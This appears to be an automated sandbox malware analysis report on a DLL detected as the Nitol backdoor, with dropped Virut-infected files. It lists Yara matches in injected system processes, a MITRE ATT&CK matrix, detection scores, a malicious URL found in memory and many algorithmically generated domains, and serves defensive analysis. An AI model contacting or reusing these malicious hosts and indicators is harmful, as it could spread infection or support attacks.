Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1836, type: MEMORYSTR

Remote Access Functionality

Yara detected Virut

Source: Yara match	File source: 21.2.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.2743535164.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2741797049.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2743367209.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2743542686.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2798846486.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2742331815.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2744487406.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2743363395.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2743906496.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.1516357060.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2742839099.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2744241055.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2741751352.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2743908241.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2017093698.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1519926327.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2798955144.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2742966295.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2742677643.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2745114770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2742603638.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2743903996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2043911687.000000007FE20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2743612981.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2744408295.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2743736063.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1537557780.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2017013687.000000007FE20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.1514452533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2743037216.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2742840917.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2798456887.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2743087540.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.1550287003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1512389471.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2742759300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1498055145.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2741922410.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2741956104.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1491890758.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2741930750.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.1509606581.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2743461282.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2742552059.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.1522184005.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2741922176.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1495302635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1542306261.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2742576822.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2798241222.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1496798093.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2742703107.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2742760458.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2742198516.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2744126681.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.1572545222.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2066888535.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2743852596.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2743091000.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1509586132.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2742914219.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2741867843.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2043996617.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1491843448.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2798238281.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2798310722.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2744224357.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2741748612.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2742335064.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2742967559.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.1525893859.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2742301520.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2742837753.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2742525977.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2743537432.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2742450602.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2741745861.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.1564612279.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2742498334.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hrl97BF.tmp PID: 5732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hrl97AF.tmp PID: 3388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winlogon.exe PID: 584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwm.exe PID: 992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hrlA367.tmp PID: 3916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1836, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	2 Windows Service	2 Windows Service	221 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Service Execution	1 DLL Side-Loading	512 Process Injection	1 Disable or Modify Tools	LSASS Memory	361 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	22 Native API	Logon Script (Windows)	1 DLL Side-Loading	1 Modify Registry	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Virtualization/Sandbox Evasion	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	234 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Install Root Certificate	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Software Packing	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 DLL Side-Loading	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 File Deletion	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
26B1sczZ88.dll	97%	ReversingLabs	Win32.Backdoor.Nitol
26B1sczZ88.dll	100%	Avira	TR/Nitol.blanu
26B1sczZ88.dll	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	100%	Avira	W32/Virut.Gen
C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp	100%	Avira	W32/Virut.Gen
C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	100%	Avira	W32/Virut.Gen
C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	100%	Avira	W32/Virut.Gen
C:\Users\user\AppData\Local\Temp\hrlA367.tmp	100%	Avira	W32/Virut.Gen
C:\Windows\SysWOW64\zvhcfa.exe	100%	Avira	W32/Virut.Gen
C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\hrlA367.tmp	100%	Joe Sandbox ML
C:\Windows\SysWOW64\zvhcfa.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\SOFTWARE.LOG (copy)	97%	ReversingLabs	Win32.Network.Virut
C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	97%	ReversingLabs	Win32.Network.Virut
C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	97%	ReversingLabs	Win32.Network.Virut
C:\Users\user\AppData\Local\Temp\hrlA367.tmp	97%	ReversingLabs	Win32.Network.Virut
C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	97%	ReversingLabs	Win32.Network.Virut
C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp	97%	ReversingLabs	Win32.Network.Virut
C:\Windows\SysWOW64\zvhcfa.exe	97%	ReversingLabs	Win32.Network.Virut

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000009.00000002.2760713212.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1492737881.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp	false	high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	false	high
https://windows.msn.com/shell	svchost.exe, 0000000A.00000002.2789825589.000001A31C054000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1495785024.000001A31C054000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://Passport.NET/STS%3C/ds:KeyName%3E%3C/ds:KeyInfo%3E%3CCipherData%3E%3CCipherValue%3EM.C506_SN1	lsass.exe, 00000009.00000002.2760713212.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp	false	high
http://www.Brenz.pl/rc/	hrl97BF.tmp, 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, hrl97BF.tmp, 00000006.00000002.2016979532.000000007FE10000.00000040.80000000.00040000.00000000.sdmp, hrl97AF.tmp, 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, hrl97AF.tmp, 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, hrl97AF.tmp, 00000007.00000002.2043860940.000000007FE10000.00000040.80000000.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2742302542.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.1491863951.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2741575463.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, lsass.exe, 00000009.00000002.2742148992.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, lsass.exe, 00000009.00000002.2743236363.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.2741589846.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.2742275015.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, svchost.exe, 0000000A.00000000.1493902232.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, fontdrvhost.exe, 0000000B.00000002.2741580715.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, fontdrvhost.exe, 0000000B.00000002.2798564614.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000002.2741587779.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000002.2798453376.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.2743314432.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.2742234796.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000E.00000002.2741590621.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000E.00000002.2742653531.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	false	unknown
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/soap12/P	lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	false	high
https://windows.msn.cn/shellRESP	svchost.exe, 0000000A.00000002.2789825589.000001A31C054000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1495785024.000001A31C054000.00000004.00000001.00020000.00000000.sdmp	false	high
http://Passport.NET/tb	Microsoft-Windows-LiveId%4Operational.evtx.25.dr	false	high
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000009.00000002.2760713212.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1492737881.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp	false	high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://cacerts.digic	lsass.exe, 00000009.00000000.1493523293.000002A29123E000.00000004.00000001.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578325
Start date and time:	2024-12-19 15:32:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	28
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	26B1sczZ88.dll renamed because original name is a hash value
Original Sample Name:	6aff1202f53fe4cc6282f9ad3ebdef95bb4cf49f.dll
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@25/72@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 69 Number of non-executed functions: 266
Cookbook Comments:	Found application associated with file extension: .dll

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 20.190.177.82, 20.190.177.84, 20.190.147.12, 20.190.147.9, 20.190.177.22, 20.190.147.7, 20.190.177.146, 20.190.177.20, 4.245.163.56, 20.189.173.20, 13.107.246.63
Excluded domains from analysis (whitelisted): nvaijl.com, fxyavq.com, zemivi.com, eqoxwa.com, qeixpq.com, qfstid.com, gizyod.com, eoswhi.com, sjjile.com, vezeoe.com, pnfkay.com, rraenf.com, fncqle.com, gjtywo.com, yeaedh.com, oseynl.com, lityoa.com, ldgoti.com, zdtwjb.com, bsfxpd.com, rmqiuq.com, vxpesz.com, wohbil.com, faxkac.com, tpwowx.com, gkbtuu.com, nsqixt.com, zuotaq.com, iezcob.com, ikuhms.com, gqmneh.com, apqqgj.com, phdomu.com, cwkzpg.com, hcpgso.com, eekder.com, eiqljd.com, siytue.com, pugtjb.com, faweja.com, anvdkc.com, itmffg.com, fcamil.com, ovprrb.com, rqicen.com, oxoimf.com, iqdacv.com, prdv4a.aadg.msidentity.com, yirgbw.com, iemjen.com, goyzko.com, xunnfu.com, bvvknd.com, yqhfpu.com, maxasl.com, qikggc.com, login.msa.msidentity.com, ihybog.com, ootumr.com, iqewjg.com, ogvgft.com, uxbegb.com, wmducp.com, slscr.update.microsoft.com, gnwvmu.com, ynwpie.com, hxhxsk.com, qnrfpi.com, lacjuz.com, ocsp.digicert.com, login.live.com, cdqboa.com, oehqcn.com, kduiuv.com, vlscru.com, zuetyk.com, eupkbf.co
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
VT rate limit hit for: 26B1sczZ88.dll

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	Gioia Faggioli-End Of Year-Bonus.docx	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdf	Get hash	malicious	PDFPhish	Browse	199.232.214.172
	jhsdgfjkh236.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	199.232.214.172
	RECOUVREMENT -FACTURER1184521.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	QhR8Zp6fZs.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	LbtytfWpvx.vbs	Get hash	malicious	Remcos	Browse	199.232.210.172
	YinLHGpoX4.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	199.232.214.172
	gCXzb0K8Ci.ps1	Get hash	malicious	Unknown	Browse	199.232.210.172
	H2PspQWoHE.ps1	Get hash	malicious	Unknown	Browse	199.232.214.172
	H6epOhxoPY.ps1	Get hash	malicious	Unknown	Browse	199.232.210.172

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	modified
Size (bytes):	11136
Entropy (8bit):	7.977801559819467
Encrypted:	false
